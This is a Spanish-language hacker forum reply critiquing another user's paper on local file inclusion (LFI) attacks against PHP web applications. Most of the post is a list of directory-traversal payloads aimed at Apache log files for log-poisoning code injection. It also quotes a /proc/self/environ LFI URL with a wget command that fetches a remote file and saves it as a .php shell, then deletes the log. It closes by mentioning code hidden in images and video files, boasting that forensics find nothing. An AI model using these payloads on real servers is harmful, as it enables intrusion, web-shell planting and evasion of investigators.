Lei el paper pepeluxx, siento que algunas cosas se puede automatizar mas mediante algun tipo de fuzzer sin usar tanto "perl" para vulnerabilidades ya conocidas y tan "trilladas" como LFI, RFI , Blind, me gusta usar las tools de
mandingo las conoceis ? ademas de uno que otro fuzzer que realmente vale la pena, tambien es posible mejorar algunos vectores que igual valdria la pena agregar a tu paper y/o mencionar.
-----[ 2.2.1 - Injecting PHP code into apache logs
Seguramente te falto mencionar estos Vectores aunque no he ordenado algunos mas, donde tambien son interesantes.
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
----[ 2.2.2 - Injecting PHP code into process table
Vaya interesante no le conocia, las referencias que agregas respecto a esta tecnica, se menciona algo como esto:
url = 'http://www.g-brain.net/index.php?page=../../../proc/self/environ'
cmd = 'wget http://www.g-brain.net/fish.txt -O fish.php;rm wget-log'
Antes de realizarlo se tedria que conocer el verdaro PATH de donde es encuentra el proc, estoy en slackware y sunOs x86 cambia bastante, una lista de ello haria falta, que tambien no esta referenciado, pepeluxx tu paper me da la impresion de que basado en su gran mayoria en el mismo que haces referencia
http://www.g-brain.net/tutorials/local-file-inclusions.txt-----[ 2.2.3 - Injecting PHP code into an image
Mmm pepeluxx te haz leido el paper de codebreak de w4cking.com mmm me parece existe un video tambien, pero la moda es hacerlo funcionar ya no solo en .jpg , gif etc, es interesante usarlo en . swf y hasta en video .flv. mpeg :-) , bueno la idea me la dio sirdarckcat y quedo de lujo, los forenses no encuentran nada XDD
Hey pepeluxx te ha quedado de lujo, esperamos la version en Spanish que seria un poco mas entendible y original para la Spanish Race.... mantenos informado de la version sobre este mismo hilo.
-berz3k. 
Mostrar Mensajes
